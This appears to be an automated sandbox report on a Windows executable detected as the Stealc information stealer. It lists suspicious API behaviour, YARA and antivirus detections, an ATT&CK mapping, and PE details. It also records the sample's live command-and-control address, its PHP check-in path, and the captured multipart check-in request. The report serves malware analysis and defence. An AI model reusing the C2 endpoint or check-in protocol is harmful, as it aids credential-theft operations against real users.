                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: _!Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B17B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 3536, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (leading digits are the count badges carried over from the original matrix)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.phpV | 17% | Virustotal | | Browse
                http://185.215.113.37/e2b1563c6670f193.phpn | 17% | Virustotal | | Browse
                http://185.215.113.37/H | 17% | Virustotal | | Browse
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpn | file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/H | file.exe, 00000000.00000002.2102191694.0000000001238000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpV | file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1525474
                Start date and time:2024-10-04 09:44:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 87
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | Get hash | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | Browse | 185.215.113.37/e2b1563c6670f193.php
                No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | Aura.exe | Get hash | malicious | RedLine | Browse | 185.215.113.22
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                No context
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.947855656085323
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'874'432 bytes
                MD5:0ab8fd273f356fc72fc0d8971976f60e
                SHA1:f88991b3868aad8231d28caa354f0f8a29deeb3b
                SHA256:6b87bd43d236ccd979ff563fea34490f006871209d6db9123c494a1a9138fd2d
                SHA512:3c9ca086a2e351f5fa894dedcefbb52c2c8b0735fe79c743769c4f00cb7ab383f88428c733837393d5b6a9692b538f204b1b59f15380914d8a3dfdd080543ff2
                SSDEEP:24576:nYbrBfGzNXBOybduTfsDb+2Ew2WngxgM9G6S+NG1TvoG0pRZzh89uq6WgT+nvIg4:nYdUxOyqfsDb0wxgOINpNsTs8NNNeV
                TLSH:6E8533B1EE11E496E469A630CC2BC32F79B5F9E574DA0EB079FC51B7979004A05ED02C
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash:00928e8e8686b000
                Entrypoint:0xab2000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction
                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 3899c9ecec365d4db50ffbfa0d2b3d0f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x25e000 | 0x2af000 | 0x200 | e84d6fdfa6dabc43eca0796d6767ab5e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                incycuuu | 0x50d000 | 0x1a4000 | 0x1a3800 | 886b6a7b843221d10701ec5044d49e26 | False | 0.9948040822407628 | data | 7.953045233922871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                crmoanhn | 0x6b1000 | 0x1000 | 0x400 | 674bcc98d84f6ea570b0dd59cf71c60c | False | 0.8359375 | data | 6.3119947292621905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x6b2000 | 0x3000 | 0x2200 | 96105a6e1f60aab01be989d9830cfab0 | False | 0.080078125 | DOS executable (COM) | 1.0390559895018023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-04T09:45:05.821293+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 4, 2024 09:45:04.863622904 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:04.868904114 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 4, 2024 09:45:04.869003057 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:04.869113922 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:04.873917103 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 4, 2024 09:45:05.585304022 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 4, 2024 09:45:05.585366964 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:05.588709116 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:05.593564987 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 4, 2024 09:45:05.821223974 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                Oct 4, 2024 09:45:05.821293116 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                Oct 4, 2024 09:45:08.446281910 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                • 185.215.113.37
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 3536 | C:\Users\user\Desktop\file.exe
                Timestamp | Bytes transferred | Direction | Data
                Oct 4, 2024 09:45:04.869113922 CEST | 89 | OUT
                GET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 4, 2024 09:45:05.585304022 CEST | 203 | IN
                HTTP/1.1 200 OK
                Date: Fri, 04 Oct 2024 07:45:05 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 4, 2024 09:45:05.588709116 CEST | 412 | OUT
                POST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Ascii (211-byte multipart body; the CRLF line breaks present in the raw bytes are restored here):
                ------AEHIECAFCGDBFHIDBKFC
                Content-Disposition: form-data; name="hwid"

                42BACCFE13991312647697
                ------AEHIECAFCGDBFHIDBKFC
                Content-Disposition: form-data; name="build"

                doma
                ------AEHIECAFCGDBFHIDBKFC--
                Oct 4, 2024 09:45:05.821223974 CEST | 210 | IN
                HTTP/1.1 200 OK
                Date: Fri, 04 Oct 2024 07:45:05 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s= (base64 for "block")


                Target ID:0
                Start time:03:45:00
                Start date:04/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0xb00000
                File size:1'874'432 bytes
                MD5 hash:0AB8FD273F356FC72FC0D8971976F60E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2061075276.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                  Execution Graph

                  Execution Coverage:8.2%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:10.1%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:24
14047 b045c0 2 API calls 14046->14047 14048 b029a2 14047->14048 14049 b045c0 2 API calls 14048->14049 14050 b029bb 14049->14050 14051 b045c0 2 API calls 14050->14051 14052 b029d4 14051->14052 14053 b045c0 2 API calls 14052->14053 14054 b029ed 14053->14054 14055 b045c0 2 API calls 14054->14055 14056 b02a06 14055->14056 14057 b045c0 2 API calls 14056->14057 14058 b02a1f 14057->14058 14059 b045c0 2 API calls 14058->14059 14060 b02a38 14059->14060 14061 b045c0 2 API calls 14060->14061 14062 b02a51 14061->14062 14063 b045c0 2 API calls 14062->14063 14064 b02a6a 14063->14064 14065 b045c0 2 API calls 14064->14065 14066 b02a83 14065->14066 14067 b045c0 2 API calls 14066->14067 14068 b02a9c 14067->14068 14069 b045c0 2 API calls 14068->14069 14070 b02ab5 14069->14070 14071 b045c0 2 API calls 14070->14071 14072 b02ace 14071->14072 14073 b045c0 2 API calls 14072->14073 14074 b02ae7 14073->14074 14075 b045c0 2 API calls 14074->14075 14076 b02b00 14075->14076 14077 b045c0 2 API calls 14076->14077 14078 b02b19 14077->14078 14079 b045c0 2 API calls 14078->14079 14080 b02b32 14079->14080 14081 b045c0 2 API calls 14080->14081 14082 b02b4b 14081->14082 14083 b045c0 2 API calls 14082->14083 14084 b02b64 14083->14084 14085 b045c0 2 API calls 14084->14085 14086 b02b7d 14085->14086 14087 b045c0 2 API calls 14086->14087 14088 b02b96 14087->14088 14089 b045c0 2 API calls 14088->14089 14090 b02baf 14089->14090 14091 b045c0 2 API calls 14090->14091 14092 b02bc8 14091->14092 14093 b045c0 2 API calls 14092->14093 14094 b02be1 14093->14094 14095 b045c0 2 API calls 14094->14095 14096 b02bfa 14095->14096 14097 b045c0 2 API calls 14096->14097 14098 b02c13 14097->14098 14099 b045c0 2 API calls 14098->14099 14100 b02c2c 14099->14100 14101 b045c0 2 API calls 14100->14101 14102 b02c45 14101->14102 14103 b045c0 2 API calls 14102->14103 14104 b02c5e 14103->14104 14105 b045c0 2 API calls 14104->14105 14106 b02c77 14105->14106 14107 b045c0 2 API calls 14106->14107 14108 b02c90 14107->14108 14109 b045c0 2 
API calls 14108->14109 14110 b02ca9 14109->14110 14111 b045c0 2 API calls 14110->14111 14112 b02cc2 14111->14112 14113 b045c0 2 API calls 14112->14113 14114 b02cdb 14113->14114 14115 b045c0 2 API calls 14114->14115 14116 b02cf4 14115->14116 14117 b045c0 2 API calls 14116->14117 14118 b02d0d 14117->14118 14119 b045c0 2 API calls 14118->14119 14120 b02d26 14119->14120 14121 b045c0 2 API calls 14120->14121 14122 b02d3f 14121->14122 14123 b045c0 2 API calls 14122->14123 14124 b02d58 14123->14124 14125 b045c0 2 API calls 14124->14125 14126 b02d71 14125->14126 14127 b045c0 2 API calls 14126->14127 14128 b02d8a 14127->14128 14129 b045c0 2 API calls 14128->14129 14130 b02da3 14129->14130 14131 b045c0 2 API calls 14130->14131 14132 b02dbc 14131->14132 14133 b045c0 2 API calls 14132->14133 14134 b02dd5 14133->14134 14135 b045c0 2 API calls 14134->14135 14136 b02dee 14135->14136 14137 b045c0 2 API calls 14136->14137 14138 b02e07 14137->14138 14139 b045c0 2 API calls 14138->14139 14140 b02e20 14139->14140 14141 b045c0 2 API calls 14140->14141 14142 b02e39 14141->14142 14143 b045c0 2 API calls 14142->14143 14144 b02e52 14143->14144 14145 b045c0 2 API calls 14144->14145 14146 b02e6b 14145->14146 14147 b045c0 2 API calls 14146->14147 14148 b02e84 14147->14148 14149 b045c0 2 API calls 14148->14149 14150 b02e9d 14149->14150 14151 b045c0 2 API calls 14150->14151 14152 b02eb6 14151->14152 14153 b045c0 2 API calls 14152->14153 14154 b02ecf 14153->14154 14155 b045c0 2 API calls 14154->14155 14156 b02ee8 14155->14156 14157 b045c0 2 API calls 14156->14157 14158 b02f01 14157->14158 14159 b045c0 2 API calls 14158->14159 14160 b02f1a 14159->14160 14161 b045c0 2 API calls 14160->14161 14162 b02f33 14161->14162 14163 b045c0 2 API calls 14162->14163 14164 b02f4c 14163->14164 14165 b045c0 2 API calls 14164->14165 14166 b02f65 14165->14166 14167 b045c0 2 API calls 14166->14167 14168 b02f7e 14167->14168 14169 b045c0 2 API calls 14168->14169 14170 b02f97 14169->14170 14171 b045c0 2 API calls 
14170->14171 14172 b02fb0 14171->14172 14173 b045c0 2 API calls 14172->14173 14174 b02fc9 14173->14174 14175 b045c0 2 API calls 14174->14175 14176 b02fe2 14175->14176 14177 b045c0 2 API calls 14176->14177 14178 b02ffb 14177->14178 14179 b045c0 2 API calls 14178->14179 14180 b03014 14179->14180 14181 b045c0 2 API calls 14180->14181 14182 b0302d 14181->14182 14183 b045c0 2 API calls 14182->14183 14184 b03046 14183->14184 14185 b045c0 2 API calls 14184->14185 14186 b0305f 14185->14186 14187 b045c0 2 API calls 14186->14187 14188 b03078 14187->14188 14189 b045c0 2 API calls 14188->14189 14190 b03091 14189->14190 14191 b045c0 2 API calls 14190->14191 14192 b030aa 14191->14192 14193 b045c0 2 API calls 14192->14193 14194 b030c3 14193->14194 14195 b045c0 2 API calls 14194->14195 14196 b030dc 14195->14196 14197 b045c0 2 API calls 14196->14197 14198 b030f5 14197->14198 14199 b045c0 2 API calls 14198->14199 14200 b0310e 14199->14200 14201 b045c0 2 API calls 14200->14201 14202 b03127 14201->14202 14203 b045c0 2 API calls 14202->14203 14204 b03140 14203->14204 14205 b045c0 2 API calls 14204->14205 14206 b03159 14205->14206 14207 b045c0 2 API calls 14206->14207 14208 b03172 14207->14208 14209 b045c0 2 API calls 14208->14209 14210 b0318b 14209->14210 14211 b045c0 2 API calls 14210->14211 14212 b031a4 14211->14212 14213 b045c0 2 API calls 14212->14213 14214 b031bd 14213->14214 14215 b045c0 2 API calls 14214->14215 14216 b031d6 14215->14216 14217 b045c0 2 API calls 14216->14217 14218 b031ef 14217->14218 14219 b045c0 2 API calls 14218->14219 14220 b03208 14219->14220 14221 b045c0 2 API calls 14220->14221 14222 b03221 14221->14222 14223 b045c0 2 API calls 14222->14223 14224 b0323a 14223->14224 14225 b045c0 2 API calls 14224->14225 14226 b03253 14225->14226 14227 b045c0 2 API calls 14226->14227 14228 b0326c 14227->14228 14229 b045c0 2 API calls 14228->14229 14230 b03285 14229->14230 14231 b045c0 2 API calls 14230->14231 14232 b0329e 14231->14232 14233 b045c0 2 API calls 14232->14233 
14234 b032b7 14233->14234 14235 b045c0 2 API calls 14234->14235 14236 b032d0 14235->14236 14237 b045c0 2 API calls 14236->14237 14238 b032e9 14237->14238 14239 b045c0 2 API calls 14238->14239 14240 b03302 14239->14240 14241 b045c0 2 API calls 14240->14241 14242 b0331b 14241->14242 14243 b045c0 2 API calls 14242->14243 14244 b03334 14243->14244 14245 b045c0 2 API calls 14244->14245 14246 b0334d 14245->14246 14247 b045c0 2 API calls 14246->14247 14248 b03366 14247->14248 14249 b045c0 2 API calls 14248->14249 14250 b0337f 14249->14250 14251 b045c0 2 API calls 14250->14251 14252 b03398 14251->14252 14253 b045c0 2 API calls 14252->14253 14254 b033b1 14253->14254 14255 b045c0 2 API calls 14254->14255 14256 b033ca 14255->14256 14257 b045c0 2 API calls 14256->14257 14258 b033e3 14257->14258 14259 b045c0 2 API calls 14258->14259 14260 b033fc 14259->14260 14261 b045c0 2 API calls 14260->14261 14262 b03415 14261->14262 14263 b045c0 2 API calls 14262->14263 14264 b0342e 14263->14264 14265 b045c0 2 API calls 14264->14265 14266 b03447 14265->14266 14267 b045c0 2 API calls 14266->14267 14268 b03460 14267->14268 14269 b045c0 2 API calls 14268->14269 14270 b03479 14269->14270 14271 b045c0 2 API calls 14270->14271 14272 b03492 14271->14272 14273 b045c0 2 API calls 14272->14273 14274 b034ab 14273->14274 14275 b045c0 2 API calls 14274->14275 14276 b034c4 14275->14276 14277 b045c0 2 API calls 14276->14277 14278 b034dd 14277->14278 14279 b045c0 2 API calls 14278->14279 14280 b034f6 14279->14280 14281 b045c0 2 API calls 14280->14281 14282 b0350f 14281->14282 14283 b045c0 2 API calls 14282->14283 14284 b03528 14283->14284 14285 b045c0 2 API calls 14284->14285 14286 b03541 14285->14286 14287 b045c0 2 API calls 14286->14287 14288 b0355a 14287->14288 14289 b045c0 2 API calls 14288->14289 14290 b03573 14289->14290 14291 b045c0 2 API calls 14290->14291 14292 b0358c 14291->14292 14293 b045c0 2 API calls 14292->14293 14294 b035a5 14293->14294 14295 b045c0 2 API calls 14294->14295 14296 b035be 
